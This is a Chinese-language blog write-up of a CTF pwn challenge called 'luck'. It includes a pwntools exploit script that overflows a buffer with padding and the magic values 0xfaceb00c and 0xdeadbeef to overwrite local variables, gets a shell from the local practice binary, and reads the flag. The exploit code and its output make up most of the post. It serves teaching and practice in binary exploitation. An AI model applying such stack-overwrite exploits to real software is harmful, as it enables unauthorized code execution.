Pwnctf luck Writeup

kazma 成大資安社 創辦人/社長
  2023-12-18 15:19:09 2023-12-18 15:19:09 Created   2023-12-18 16:10:21 2023-12-18 16:10:21 Updated    

luck

這題的目標是符合一系列的條件之後他就會發一個 shell 給我們,
具體條件和區域變數如下:

stack

conditions

random

應該蠻淺顯易懂的 XD,直接上 exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *

context.arch = 'amd64'
r = process('./luck')

r.recvuntil(b'\n')
r.recvuntil(b'\n')

p = flat(
    b'a'*12,
    p32(0xfaceb00c),
    p32(0xdeadbeef),
    p32(0x1)
)

r.sendline(p)
#r.sendline(b'1')
#r.sendline(b'cat flag')
r.interactive()

result:

1
2
3
4
5
6
7
8
9
10
└─$ python exploit.py
[+] Starting local process './luck': pid 291024
[*] Switching to interactive mode
You say: aaaaaaaaaaaa\x0c\xb0\xce\xfaᆳ\xde
Hello hacker, now guess the password.
A good hacker always 100% guess right :P, are you a good hacker?
password:$ 1
Here is your shell!
$ cat flag
BreakALLCTF{apFGcJ7XRCfXhsdu5VZl}

Pwned !!!

  • Title: Pwnctf luck Writeup
  • Author: kazma
  • Created at : 2023-12-18 15:19:09
  • Updated at : 2023-12-18 16:10:21
  • Link: https://kazma.tw/2023/12/18/Pwnctf-luck-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments
On this page
Pwnctf luck Writeup
  1. luck